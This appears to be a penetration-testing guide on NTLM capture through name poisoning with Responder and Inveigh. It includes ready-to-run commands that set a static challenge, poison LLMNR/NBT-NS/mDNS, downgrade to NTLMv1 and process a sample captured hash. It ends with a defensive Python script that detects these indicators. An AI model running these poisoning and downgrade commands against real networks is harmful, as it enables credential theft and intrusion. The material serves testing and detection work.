NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different "authentication forcing" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).
Responder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.
For Inveigh, the challenge value can be set with a command-line argument. For Responder, testers need to edit the configuration file.
sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf
From UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with --disable-ess in order to obtain NTLMv1 responses.
responder --interface "eth0" --analyze
responder -I "eth0" -A
# with downgrading
responder --interface "eth0" --analyze --lm --disable-ess
ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
There are cases where a downgrade attempt will fail and no captured authentication will be shown. Testers should always try to capture authentications both with and without downgrading.
Start poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures
.\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
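As an added example (not part of the original page, nor code from the Responder or Inveigh projects), the following Python script shows the defender's side of the two indicators discussed above: it parses an NTLM CHALLENGE_MESSAGE (Type 2) the way a network sensor would and flags a static 1122334455667788 server challenge or a missing Extended Session Security flag (the condition --disable-ess creates), and it parses the user::domain:LMresp:NTresp:challenge line format shown with ntlmv1-multi. The Type 2 message is constructed inline for the example; the target name SRV01, the finding strings and the helper names are assumptions of this example, while the flag values and field offsets follow the [MS-NLMP] layout.

```python
import struct

# Negotiate flags from [MS-NLMP]; only the ones this example needs.
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_REQUEST_TARGET = 0x00000004
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_TARGET_TYPE_SERVER = 0x00020000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000  # "ESS"; absent -> NTLMv1 downgrade possible

# The static challenge the page configures in Responder.conf / Inveigh -Challenge.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")

# Constructed sample in the ntlmv1-multi line format shown on the page (same values as the page).
SAMPLE_NETNTLMV1_LINE = (
    "SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:"
    "AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788"
)


def build_challenge_message(challenge: bytes, flags: int, target: str = "SRV01") -> bytes:
    """Build a minimal CHALLENGE_MESSAGE (Type 2) with no TargetInfo and no Version field.
    Constructed for this example so the parser below has something to run on."""
    name = target.encode("utf-16-le")
    header_len = 48  # fixed part: signature, type, TargetNameFields, flags, challenge, reserved, TargetInfoFields
    body = b"NTLMSSP\x00" + struct.pack("<I", 2)
    body += struct.pack("<HHI", len(name), len(name), header_len)  # TargetNameFields (Len, MaxLen, Offset)
    body += struct.pack("<I", flags)                               # NegotiateFlags
    body += challenge                                              # ServerChallenge (8 bytes)
    body += b"\x00" * 8                                            # Reserved
    body += struct.pack("<HHI", 0, 0, header_len + len(name))      # TargetInfoFields (empty)
    return body + name


def parse_challenge_message(data: bytes) -> dict:
    """Extract flags, server challenge and target name from a raw Type 2 message."""
    if data[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", data, 8)[0]
    if msg_type != 2:
        raise ValueError(f"expected CHALLENGE_MESSAGE (type 2), got {msg_type}")
    name_len, _, name_off = struct.unpack_from("<HHI", data, 12)
    flags = struct.unpack_from("<I", data, 20)[0]
    challenge = data[24:32]
    raw_name = data[name_off:name_off + name_len]
    if flags & NTLMSSP_NEGOTIATE_UNICODE:
        target = raw_name.decode("utf-16-le")
    else:
        target = raw_name.decode("ascii", "replace")
    return {"flags": flags, "challenge": challenge, "target": target}


def assess_challenge(data: bytes) -> list:
    """Return findings that point at a capturing or downgrading server (empty list = nothing suspicious)."""
    msg = parse_challenge_message(data)
    findings = []
    if msg["challenge"] == STATIC_CHALLENGE:
        findings.append("static server challenge 1122334455667788 (known capture-tool default)")
    if not (msg["flags"] & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY):
        findings.append("extended session security not negotiated (NTLMv1 downgrade possible)")
    return findings


def parse_netntlm_line(line: str) -> dict:
    """Parse the user::domain:LMresp:NTresp:challenge capture format and classify it.
    A 24-byte (48 hex) NT response is NTLMv1; anything longer is NTLMv2."""
    user, _, domain, lm_resp, nt_resp, challenge = line.strip().split(":")
    return {
        "user": user,
        "domain": domain,
        "lm_response": lm_resp,
        "nt_response": nt_resp,
        "challenge": challenge,
        "ntlm_version": 1 if len(nt_resp) == 48 else 2,
        "static_challenge": bytes.fromhex(challenge) == STATIC_CHALLENGE,
    }


if __name__ == "__main__":
    suspicious = build_challenge_message(
        STATIC_CHALLENGE,
        NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_REQUEST_TARGET | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_SERVER,
    )
    for finding in assess_challenge(suspicious):
        print("finding:", finding)
    print(parse_netntlm_line(SAMPLE_NETNTLMV1_LINE))
```

A real sensor would pull the Type 2 message out of the SMB, HTTP (`WWW-Authenticate: NTLM <base64>`) or LDAP exchange first; the parser above starts at the NTLMSSP signature, so it can be fed the decoded blob from any of those protocols. Note that legitimate servers also occasionally omit ESS, so the second finding is a weaker signal than the static challenge and is best correlated with the first.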